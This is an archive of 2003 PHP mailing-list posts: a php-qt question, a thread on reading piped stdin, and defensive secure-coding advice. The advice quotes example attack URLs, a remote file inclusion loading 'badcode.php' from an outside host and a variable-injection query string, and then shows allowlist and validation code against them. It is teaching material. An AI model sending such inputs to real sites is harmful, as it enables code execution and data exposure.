[PHP] php-qt ?

2003-07-17 Thread Marco Weber
hi @all,

i know php-gtk and i like it...
however, i prefer qt... ;)

is there a possibility to use qt for guis?

thanks in advance for any reply
Marco Weber



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] how to read the stuff that got piped ("|") to the script?

2003-05-27 Thread Marco Weber
hi,

i've a simple question:

how can i read the stuff that got piped ("|") to the php-script?

i.e. "ls -l | /home/myuser/phpscript.php"



thanks in advance for any help



Marco Weber







Re: [PHP] but if i do so, my script won't stop reading... :(

2003-05-27 Thread Marco Weber

hi
> It is the stdin of the script, you can open that file handle with fopen(
> "stdin", "r" ); i believe
i also thought so, but there is a big problem:
the script runs in an infinite loop... :(
that's my piece of code:
$message='';
$input=fopen('php://stdin', 'r');
while(!feof($input)) $message.=fgets($input, 4096);
fclose($input);

...but the condition in the while loop never gets true... :(
so what can i do?

Thanks in advance
Marco Weber






[PHP] Re: secure code

2003-05-27 Thread Marco Weber
hi,

well, there are a lot of articles on the internet...
however, i bought a book... it really helped a lot! :)

there are so many things, developers can do wrong, but here is a listing of
the most important ones:

but the most important thing you can do is to check every variable for bad
characters...
with some special chars you can manipulate SQL-queries, open other files (on
the local system OR even on remote systems) or even execute some nice
bash-scripts...
(you can avoid such attacks, if you've set register_globals to Off)
i.e.
if you include a page in your securityhole1.php via http get/post vars:

make sure, the users can't enter something like this:
securityhole1.php?page=http://www.somewhere.else/badcode.php

the second important thing is to set the variables you need to a specific
value, before you start using them, so that the users can't do something,
they shouldn't do by setting the variable to a value by a get/post request:
i.e. securityhole2.php:

in this case you can access secret information by using the following url:
securityhole2.php?showstuff=yes

it's also quite important to check numbers for their value (are they too high
/ low)...
i made the experience, that you can slow down a webserver a lot, if you send
multiple requests with number values that lead i.e. to an infinite loop...
although php terminates the scripts after X seconds, it gives you the
possibility to run a lot of php scripts simultaneously! :)

Try to protect php scripts, which you don't need to access directly, i.e.
with .htaccess files...
i.e.
store your libraries/templates in a directory and protect them with a
.htaccess like this:
BEGIN OF .htaccess sample---
order deny,allow
deny from all
END OF .htaccess sample---

there are also some important facts about file uploads... but for now, it's
quite late (3:15 in the morning...) and i'm quite tired...

there are even some more problems, especially by using the session
mechanisms

i hope, this helps to fix the main security holes...

C ya and goood night to all of you... =0)

- Marco Weber -



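
The three checks named in the "secure code" message above (restricting an included page, initialising variables before use, range-checking numbers), as an added example that is not part of the original post. The page keys (`home`, `contact`), the `pages/` directory, the session `role` key and the 1..100 range are assumptions made for illustration.

```php
<?php
// Added example; page keys, directory, session key and limits are hypothetical.

// 1. Page include: the request value selects an entry in a fixed allowlist.
//    It is never used as a path or URL itself.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(array $query): string
{
    $key = $query['page'] ?? 'home';
    // is_string() rejects ?page[]=x; the lookup rejects URLs and ../ paths.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        $key = 'home';
    }
    return __DIR__ . '/pages/' . PAGES[$key];
}

// 2. Flags: assigned by the script before use and derived from server-side
//    state only, so a get/post parameter of the same name has no effect.
function may_show_stuff(array $session): bool
{
    $showstuff = false; // explicit initial value
    if (($session['role'] ?? '') === 'admin') {
        $showstuff = true;
    }
    return $showstuff;
}

// 3. Numbers: accept only integers inside a known range, else a default.
function bounded_int(array $query, string $name, int $min, int $max, int $default): int
{
    $value = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $value === false ? $default : $value;
}

// Constructed sample request, using the URL from the message above.
$request = ['page' => 'http://www.somewhere.else/badcode.php',
            'showstuff' => 'yes', 'count' => '999999999'];
var_dump(basename(resolve_page($request)));
var_dump(may_show_stuff([]));
var_dump(bounded_int($request, 'count', 1, 100, 10));
```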